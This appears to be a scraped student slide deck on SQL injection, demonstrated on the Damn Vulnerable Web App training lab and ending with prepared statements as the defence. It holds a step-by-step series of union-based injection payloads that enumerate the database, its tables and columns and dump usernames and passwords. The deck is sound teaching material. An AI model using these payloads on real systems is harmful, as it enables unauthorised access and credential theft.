* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Download SQL Injection
Entity–attribute–value model wikipedia , lookup
Microsoft Access wikipedia , lookup
Oracle Database wikipedia , lookup
Microsoft Jet Database Engine wikipedia , lookup
Clusterpoint wikipedia , lookup
Database model wikipedia , lookup
Microsoft SQL Server wikipedia , lookup
Open Database Connectivity wikipedia , lookup
SQL Injection By Wenonah Abadilla Topics • What is SQL • What is SQL Injection • Damn Vulnerable Web App • SQLI Demo • Prepared Statements What is SQL? • Way you communicate with the database • Structured Query Language • Access and manipulate databases • COSC 341 at IUP What is SQL Injection? • One of the most serious threats for Web Application • Inject SQL commands into an SQL statement, via web page input. • Alters an SQL statement and compromises the security of a web application • Common with PHP and ASP applications due to the prevalence of older functional interfaces • Occurs when • Data enters a program from an untrusted source. • The data used to dynamically construct a SQL query • SQL Injection Harvesting • SQL statements to render sensitive data Types of SQLI • Error Based • Causes an error and gather information from the error • Union Based • Combine two or more SQL statements into one result • Blind • Asking a true or false question Consequences of SQL Injection • Confidentiality • Authentication • Authorization • Integrity Damn Vulnerable Web Site Demo • PHP/MySQL web application • Aid for security professionals • Test skills and tools in a legal environment • Help developers better understand the process of securing web applications $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”; Basic Injection Webpage is supposed to print ID, First name, and Surname $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’”; Always True Scenario • Saying display all records that are false and all records that are true • %’ – probably not equal to anything, and will be false • ‘0’=‘0’ – Is equal to true, because 0 will always equal 0 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=‘0’”; Display Database Version • Notice the last displayed line • This is the version of the mysql database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, version() # “; Display Database User • Notice the last displayed line • Name of the database user that executed the behind the scenes PHP code $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, user() # ; Display Database Name • Notice the last displayed line • This is the name of the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, database() # ; Display All Tables in the information_schema • Displays all the tables in the information_schema database • INFORMATION_SCHEMA is the informational database • Stores information about all other databases that the MySQL server maintains $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables #” ; Display All User Tables in the information_schema • Displays all tables that start with the prefix “user” in the information_schema database • Quicker than looking through the previous output and manually looking for user table $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables where table_name like ‘user%’ #” ; Display all Column fields in the User Table • Displays all the columns in the users table • Notice- user_id, first_name, last_name, user and password column $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #” ; Display column Field Contents in the user table • Successfully displayed all the necessary authentication information in the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null,concat(first_name,0x0a,last_name,0x0a,user, 0x0a,password) from users #” ; Prepared Statements and Bound Parameters • The query and the data are sent to the SQL server separately • Parameterized statements, Parameterized SQL • Template for SQL Statements • Values can be plugged into the query after the query is “prepared” and ready to be executed • (?), Bound Parameters • Placeholders where actual values are plugged in Examples Statements sets “?” to an actual value that is stored in the id variable PHP using PDO Java using JDBC Conclusion • SQLI huge threat to web applications • Use Prepared SQL Statements • Download Damn Vulnerable Web App Questions? Reference Page • "Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb. 2015. <http://docs.oracle.com/cd/B10500_01/appdev.920/a96590/adg09dyn.htm>. • "(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web. 17 Feb. 2015. <http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/>. • "PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb. 2015. <http://www.w3schools.com/php/php_mysql_prepared_statements.asp>. • "SQL Injection." OWASP. N.p., 14 Aug. 2014. Web. 19 Feb. 2015. <https://www.owasp.org/index.php/SQL_Injection>. • "SQL Injection." W3school. N.p., n.d. Web. 15 Feb. 2015. <http://www.w3schools.com/sql/sql_injection.asp>.